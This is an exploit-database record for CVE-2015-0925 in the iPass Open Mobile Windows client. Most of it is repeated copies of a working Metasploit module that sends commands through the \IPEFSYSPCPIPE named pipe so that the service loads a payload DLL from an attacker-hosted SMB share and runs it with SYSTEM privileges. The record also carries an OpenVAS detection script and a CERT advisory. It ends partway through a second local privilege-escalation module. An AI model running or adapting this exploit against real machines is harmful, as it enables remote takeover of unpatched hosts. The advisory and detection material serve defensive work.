ID PACKETSTORM:130813 Type packetstorm Reporter Matthias Kaiser Modified 2015-03-13T00:00:00
Description
`##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
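class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SMB::Client::Authenticated
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  # IPass Control Pipe remote command execution (CVE-2015-0925).
  #
  # The iPass client service exposes the named pipe \IPEFSYSPCPIPE to the
  # BUILTIN\Users group, so any account that can authenticate to the target over
  # SMB (SMBUser/SMBPass from the Authenticated mixin, not necessarily an admin)
  # can reach it via IPC$. Commands are written to the pipe as UTF-16LE text;
  # "iPass.SWUpdateAssist.RegisterCOM <path>" makes the service load a DLL from
  # an arbitrary path, including a UNC path. This module therefore hosts the
  # payload DLL on a temporary SMB share (Server::Share mixin) and points the
  # service at it. The DLL runs in the context of the privileged service
  # ('Privileged' => true).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IPass Control Pipe Remote Command Execution',
      'Description'    => %q{
        This module exploits a vulnerability in the IPass Client service. This service provides a
        named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused
        to force the service to load a DLL from a SMB share.
      },
      'Author'         =>
        [
          'Matthias Kaiser', # Vulnerability discovery
          'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-0925' ],
          [ 'OSVDB', '117423' ],
          [ 'BID', '72265' ],
          [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows x32', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jan 21 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        # How long the SMB server stays up waiting for the service to fetch the
        # DLL; elapsing is the normal end of a run (see #exploit).
        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
      ], self.class)

    # Share and file names are generated in #setup, so hide the Share mixin's
    # user-settable versions.
    deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
  end

  # Confirms the control pipe is reachable and executes commands by sending a
  # System.Echo with a random token and looking for that token in the reply.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable when the token is echoed back;
  #   Unknown when it is not, or on any connection, login or SMB-level error
  #   (e.g. the pipe is missing or access is denied). Those errors are reported
  #   via vprint_error instead of escaping as exceptions.
  def check
    echo_value = rand_text_alphanumeric(rand(10) + 10)

    begin
      response = send_command("System.Echo #{echo_value}")
      # echo_value is alphanumeric, so a substring match is sufficient; no need
      # to compile it into a Regexp.
      return Exploit::CheckCode::Vulnerable if response.to_s.include?(echo_value)
      Exploit::CheckCode::Unknown
    rescue Rex::ConnectionError => e
      vprint_error("Connection failed: #{e.class}: #{e}")
      Exploit::CheckCode::Unknown
    rescue Rex::Proto::SMB::Exceptions::LoginError => e
      # Report the actual login failure (bad credentials, disabled account, ...)
      # rather than a fixed "connection reset" message.
      vprint_error("Error during login: #{e}")
      Exploit::CheckCode::Unknown
    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
      # SMB status errors from the pipe open/write/read, e.g. the pipe does not
      # exist (service absent or patched) or access is denied. Previously these
      # propagated out of check instead of yielding a CheckCode.
      vprint_error("SMB error: #{e}")
      Exploit::CheckCode::Unknown
    end
  end

  # Randomises the share and DLL names so the UNC path handed to the service
  # differs on every run.
  def setup
    super
    self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
    self.share = Rex::Text.rand_text_alpha(5)
  end

  # Called by the Share mixin once the SMB server is listening: publishes the
  # payload DLL on the share and instructs the service to register it as a COM
  # server from our UNC path, which makes the service load the DLL.
  def primer
    self.file_contents = generate_payload_dll
    print_status("File available on #{unc}...")
    send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}")
  end

  # Sends one command to the iPass control pipe and returns the reply.
  #
  # The service closes the pipe connection after every command, so each call
  # opens a fresh SMB session. The command is sent as UTF-16LE (the encoding the
  # service expects) and the reply converted back to ASCII.
  #
  # @param command [String] the control command, e.g. "System.Echo foo"
  # @return [String] the service's reply
  # @raise [Rex::ConnectionError, Rex::Proto::SMB::Exceptions::LoginError,
  #   Rex::Proto::SMB::Exceptions::ErrorCode] on transport, authentication or
  #   SMB-level failure; #check handles these, #primer lets them fail the run
  def send_command(command)
    connect
    smb_login
    pipe = simple.create_pipe('\\IPEFSYSPCPIPE')
    pipe.write(Rex::Text.to_unicode(command))
    Rex::Text.to_ascii(pipe.read)
  ensure
    # Close our side as well; the server drops the connection after each
    # command, but the module's socket was otherwise left dangling (also on the
    # login-failure path).
    disconnect
  end

  # Runs the SMB server (the Share mixin's #exploit, which invokes #primer) for
  # at most SMB_DELAY seconds. Hitting the timeout is the expected end of a run:
  # once the service has fetched the DLL there is nothing left to serve, so the
  # Timeout::Error is logged and swallowed rather than treated as a failure.
  def exploit
    Timeout.timeout(datastore['SMB_DELAY']) { super }
  rescue Timeout::Error
    vprint_status("SMB_DELAY of #{datastore['SMB_DELAY']} seconds elapsed, stopping SMB server")
  end
end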
`
{"id": "PACKETSTORM:130813", "type": "packetstorm", "bulletinFamily": "exploit", "title": "IPass Control Pipe Remote Command Execution", "description": "", "published": "2015-03-13T00:00:00", "modified": "2015-03-13T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.0}, "href": "https://packetstormsecurity.com/files/130813/IPass-Control-Pipe-Remote-Command-Execution.html", "reporter": "Matthias Kaiser", "references": [], "cvelist": ["CVE-2015-0925"], "lastseen": "2016-12-05T22:17:34", "viewCount": 11, "enchantments": {"score": {"value": 7.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "cert", "idList": ["VU:110652"]}, {"type": "cve", "idList": ["CVE-2015-0925"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/IPASS_LAUNCH_APP", "MSF:EXPLOIT/WINDOWS/SMB/IPASS_PIPE_EXEC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310808732"]}, {"type": "zdt", "idList": ["1337DAY-ID-23385"]}], "rev": 4}, "backreferences": {"references": [{"type": "cert", "idList": ["VU:110652"]}, {"type": "cve", "idList": ["CVE-2015-0925"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/IPASS_LAUNCH_APP"]}, {"type": "zdt", "idList": ["1337DAY-ID-23385"]}]}, "exploitation": null, "vulnersScore": 7.7}, "sourceHref": "https://packetstormsecurity.com/files/download/130813/ipass_pipe_exec.rb.txt", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::SMB::Client::Authenticated \ninclude Msf::Exploit::Remote::SMB::Server::Share \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'IPass Control Pipe Remote Command Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the IPass Client service. 
This service provides a \nnamed pipe which can be accessed by the user group BUILTIN\\Users. This pipe can be abused \nto force the service to load a DLL from a SMB share. \n}, \n'Author' => \n[ \n'Matthias Kaiser', # Vulnerability discovery \n'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2015-0925' ], \n[ 'OSVDB', '117423' ], \n[ 'BID', '72265' ], \n[ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows x32', { 'Arch' => ARCH_X86 } ], \n[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] \n], \n'Privileged' => true, \n'DisclosureDate' => 'Jan 21 2015', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) \n], self.class) \n \nderegister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME') \nend \n \ndef check \necho_value = rand_text_alphanumeric(rand(10) + 10) \n \nbegin \nresponse = send_command(\"System.Echo #{echo_value}\") \nif response =~ Regexp.new(echo_value) \nreturn Exploit::CheckCode::Vulnerable \nelse \nreturn Exploit::CheckCode::Unknown \nend \nrescue Rex::ConnectionError => e \nvprint_error(\"Connection failed: #{e.class}: #{e}\") \nreturn Msf::Exploit::CheckCode::Unknown \nrescue Rex::Proto::SMB::Exceptions::LoginError => e \nvprint_error('Connection reset during login') \nreturn Msf::Exploit::CheckCode::Unknown \nend \nend \n \ndef setup \nsuper \nself.file_name = \"#{Rex::Text.rand_text_alpha(7)}.dll\" \nself.share = Rex::Text.rand_text_alpha(5) \nend \n \ndef primer \nself.file_contents = generate_payload_dll \nprint_status(\"File available on #{unc}...\") \nsend_command(\"iPass.SWUpdateAssist.RegisterCOM #{unc}\") \nend \n \ndef 
send_command(command) \n# The connection is closed after each command, so we have to reopen it \nconnect \nsmb_login \npipe = simple.create_pipe('\\\\IPEFSYSPCPIPE') \npipe.write(Rex::Text.to_unicode(command)) \nresponse = Rex::Text.to_ascii(pipe.read) \n \nresponse \nend \n \n \ndef exploit \nbegin \nTimeout.timeout(datastore['SMB_DELAY']) { super } \nrescue Timeout::Error \n# do nothing... just finish exploit and stop smb server... \nend \nend \n \nend \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646625039}}
{"zdt": [{"lastseen": "2018-04-09T03:39:47", "description": "This Metasploit module exploits a vulnerability in the IPass Client service. This service provides a named pipe which can be accessed by the user group BUILTIN\\Users. This pipe can be abused to force the service to load a DLL from a SMB share.", "cvss3": {}, "published": "2015-03-13T00:00:00", "type": "zdt", "title": "iPass Control Pipe Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-0925"], "modified": "2015-03-13T00:00:00", "id": "1337DAY-ID-23385", "href": "https://0day.today/exploit/description/23385", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client::Authenticated\r\n include Msf::Exploit::Remote::SMB::Server::Share\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'IPass Control Pipe Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the IPass Client service. This service provides a\r\n named pipe which can be accessed by the user group BUILTIN\\Users. 
This pipe can be abused\r\n to force the service to load a DLL from a SMB share.\r\n },\r\n 'Author' =>\r\n [\r\n 'Matthias Kaiser', # Vulnerability discovery\r\n 'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-0925' ],\r\n [ 'OSVDB', '117423' ],\r\n [ 'BID', '72265' ],\r\n [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 2048,\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows x32', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]\r\n ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => 'Jan 21 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])\r\n ], self.class)\r\n\r\n deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')\r\n end\r\n\r\n def check\r\n echo_value = rand_text_alphanumeric(rand(10) + 10)\r\n\r\n begin\r\n response = send_command(\"System.Echo #{echo_value}\")\r\n if response =~ Regexp.new(echo_value)\r\n return Exploit::CheckCode::Vulnerable\r\n else\r\n return Exploit::CheckCode::Unknown\r\n end\r\n rescue Rex::ConnectionError => e\r\n vprint_error(\"Connection failed: #{e.class}: #{e}\")\r\n return Msf::Exploit::CheckCode::Unknown\r\n rescue Rex::Proto::SMB::Exceptions::LoginError => e\r\n vprint_error('Connection reset during login')\r\n return Msf::Exploit::CheckCode::Unknown\r\n end\r\n end\r\n\r\n def setup\r\n super\r\n self.file_name = \"#{Rex::Text.rand_text_alpha(7)}.dll\"\r\n self.share = Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def primer\r\n self.file_contents = generate_payload_dll\r\n print_status(\"File available on #{unc}...\")\r\n 
send_command(\"iPass.SWUpdateAssist.RegisterCOM #{unc}\")\r\n end\r\n\r\n def send_command(command)\r\n # The connection is closed after each command, so we have to reopen it\r\n connect\r\n smb_login\r\n pipe = simple.create_pipe('\\\\IPEFSYSPCPIPE')\r\n pipe.write(Rex::Text.to_unicode(command))\r\n response = Rex::Text.to_ascii(pipe.read)\r\n\r\n response\r\n end\r\n\r\n\r\n def exploit\r\n begin\r\n Timeout.timeout(datastore['SMB_DELAY']) { super }\r\n rescue Timeout::Error\r\n # do nothing... just finish exploit and stop smb server...\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/23385", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:35:09", "description": "This host is installed with iPass Open\n Mobile and is prone to remote code execution vulnerability.", "cvss3": {}, "published": "2016-08-03T00:00:00", "type": "openvas", "title": "iPass Open Mobile Remote Code Execution Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0925"], "modified": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310808732", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808732", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ipass_open_mobile_remote_code_exec_vuln_win.nasl 11811 2018-10-10 09:55:00Z asteins $\n#\n# iPass Open Mobile Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be 
useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\nCPE = \"cpe:/a:ipass:ipass_open_mobile\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808732\");\n script_version(\"$Revision: 11811 $\");\n script_cve_id(\"CVE-2015-0925\");\n script_bugtraq_id(72265);\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-10 11:55:00 +0200 (Wed, 10 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-03 16:39:37 +0530 (Wed, 03 Aug 2016)\");\n script_name(\"iPass Open Mobile Remote Code Execution Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with iPass Open\n Mobile and is prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to a dll pathname in a\n crafted unicode string improperly handled by a subprocess reached through a\n named pipe.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n authenticated users to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"iPass Open Mobile prior to 2.4.5\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to iPass Open Mobile 2.4.5\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n 
script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/110652\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ipass_open_mobile_detect_win.nasl\");\n script_mandatory_keys(\"IPass/OpenMobile/Win/Ver\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://www.ipass.com/\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ipassVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ipassVer, test_version:\"2.4.5\"))\n{\n report = report_fixed_ver(installed_version:ipassVer, fixed_version:\"2.4.5\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-09-28T17:53:30", "description": "### Overview\n\nThe iPass Open Mobile Windows Client versions 2.4.4 and earlier contains a remote code execution vulnerability.\n\n### Description\n\n[**CWE-94**](<http://cwe.mitre.org/data/definitions/94.html>)**: Improper Control of Generation of Code ('Code Injection')**\n\nThe iPass Open Mobile Windows Client versions 2.4.4 and earlier utilizes named pipes for interprocess communication. One of the subprocesses spawned by the client runs with SYSTEM privileges. An authenticated user can register arbitrary DLL files, including ones located at UNC paths, by sending a specially-crafted unicode string to this subprocess to one of the named pipes. The `DllMain` function in the specified DLL file will then execute with SYSTEM privileges. \n \n--- \n \n### Impact\n\nA remote, authenticated user may be able to execute arbitrary code with SYSTEM privileges. \n \n--- \n \n### Solution\n\n**Apply an Update** \n \nAffected users should update to version 2.4.5. 
\n \n--- \n \n### Vendor Information\n\n110652\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### iPass Inc Affected\n\nUpdated: January 21, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 8.5 | AV:N/AC:M/Au:S/C:C/I:C/A:C \nTemporal | 6.7 | E:POC/RL:OF/RC:C \nEnvironmental | 5.0 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://www.ipass.com/enterprise-mobility/>\n * <http://cwe.mitre.org/data/definitions/94.html>\n\n### Acknowledgements\n\nThanks to Matthias Kaiser for reporting this vulnerability.\n\nThis document was written by Todd Lewellen.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-0925](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-0925>) \n---|--- \n**Date Public:** | 2015-01-21 \n**Date First Published:** | 2015-01-21 \n**Date Last Updated: ** | 2015-01-21 16:26 UTC \n**Document Revision: ** | 24 \n", "cvss3": {}, "published": "2015-01-21T00:00:00", "type": "cert", "title": "iPass Open Mobile Windows Client contains a remote code execution vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0925"], "modified": 
"2015-01-21T16:26:00", "id": "VU:110652", "href": "https://www.kb.cert.org/vuls/id/110652", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-07T22:49:27", "description": "This module exploits a vulnerability in the IPass Client service. This service provides a named pipe which can be accessed by the user group BUILTIN\\Users. This pipe can be abused to force the service to load a DLL from a SMB share.\n", "edition": 2, "cvss3": {}, "published": "2015-03-09T15:36:11", "type": "metasploit", "title": "IPass Control Pipe Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0925"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/SMB/IPASS_PIPE_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Server::Share\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'IPass Control Pipe Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability in the IPass Client service. This service provides a\n named pipe which can be accessed by the user group BUILTIN\\Users. 
This pipe can be abused\n to force the service to load a DLL from a SMB share.\n },\n 'Author' =>\n [\n 'Matthias Kaiser', # Vulnerability discovery\n 'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2015-0925' ],\n [ 'OSVDB', '117423' ],\n [ 'BID', '72265' ],\n [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 2048,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows x32', { 'Arch' => ARCH_X86 } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => '2015-01-21',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])\n ])\n\n deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')\n end\n\n def check\n echo_value = rand_text_alphanumeric(rand(10) + 10)\n\n begin\n response = send_command(\"System.Echo #{echo_value}\")\n if response =~ Regexp.new(echo_value)\n return Exploit::CheckCode::Vulnerable\n else\n return Exploit::CheckCode::Unknown\n end\n rescue Rex::ConnectionError => e\n vprint_error(\"Connection failed: #{e.class}: #{e}\")\n return Msf::Exploit::CheckCode::Unknown\n rescue Rex::Proto::SMB::Exceptions::LoginError => e\n vprint_error(\"Error during login: #{e}\")\n return Msf::Exploit::CheckCode::Unknown\n rescue Rex::Proto::SMB::Exceptions::ErrorCode, RubySMB::Error::RubySMBError => e\n vprint_error(e.to_s)\n return Msf::Exploit::CheckCode::Unknown\n end\n end\n\n def setup\n super\n self.file_name = \"#{Rex::Text.rand_text_alpha(7)}.dll\"\n self.share = Rex::Text.rand_text_alpha(5)\n end\n\n def primer\n self.file_contents = generate_payload_dll\n print_status(\"File available on #{unc}...\")\n send_command(\"iPass.SWUpdateAssist.RegisterCOM #{unc}\")\n 
end\n\n def send_command(command)\n # The connection is closed after each command, so we have to reopen it\n connect\n smb_login\n pipe = simple.create_pipe('\\\\IPEFSYSPCPIPE')\n pipe.write(Rex::Text.to_unicode(command))\n response = Rex::Text.to_ascii(pipe.read)\n\n response\n end\n\n\n def exploit\n begin\n Timeout.timeout(datastore['SMB_DELAY']) { super }\n rescue Timeout::Error\n # do nothing... just finish exploit and stop smb server...\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ipass_pipe_exec.rb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-07T22:51:52", "description": "The named pipe, \\IPEFSYSPCPIPE, can be accessed by normal users to interact with the iPass service. The service provides a LaunchAppSysMode command which allows to execute arbitrary commands as SYSTEM.\n", "edition": 2, "cvss3": {}, "published": "2015-03-13T21:53:17", "type": "metasploit", "title": "iPass Mobile Client Service Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0925"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/IPASS_LAUNCH_APP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Post::File\n include 
Msf::Exploit::FileDropper\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Services\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'iPass Mobile Client Service Privilege Escalation',\n 'Description' => %q{\n The named pipe, \\IPEFSYSPCPIPE, can be accessed by normal users to interact\n with the iPass service. The service provides a LaunchAppSysMode command which\n allows to execute arbitrary commands as SYSTEM.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h0ng10' # Vulnerability discovery, metasploit module\n ],\n 'Arch' => ARCH_X86,\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Targets' =>\n [\n [ 'Windows', { } ]\n ],\n 'Payload' =>\n {\n 'Space' => 2048,\n 'DisableNops' => true\n },\n 'References' =>\n [\n ['CVE', '2015-0925'],\n ['URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt']\n ],\n 'DisclosureDate' => '2015-03-12',\n 'DefaultTarget' => 0\n }))\n\n register_options([\n OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)'])\n ])\n\n end\n\n def check\n os = sysinfo['OS']\n\n unless os =~ /windows/i\n return Exploit::CheckCode::Safe\n end\n\n svc = service_info('iPlatformService')\n if svc && svc[:display] =~ /iPlatformService/\n vprint_good(\"Found service '#{svc[:display]}'\")\n if is_running?\n vprint_good('Service is running')\n else\n vprint_error('Service is not running!')\n end\n\n vprint_good('Opening named pipe...')\n handle = open_named_pipe('\\\\\\\\.\\\\pipe\\\\IPEFSYSPCPIPE')\n\n if handle.nil?\n vprint_error('\\\\\\\\.\\\\pipe\\\\IPEFSYSPCPIPE named pipe not found')\n return Exploit::CheckCode::Safe\n else\n vprint_good('\\\\\\\\.\\\\pipe\\\\IPEFSYSPCPIPE found!')\n session.railgun.kernel32.CloseHandle(handle)\n end\n\n return Exploit::CheckCode::Vulnerable\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n\n def open_named_pipe(pipe)\n invalid_handle_value = 
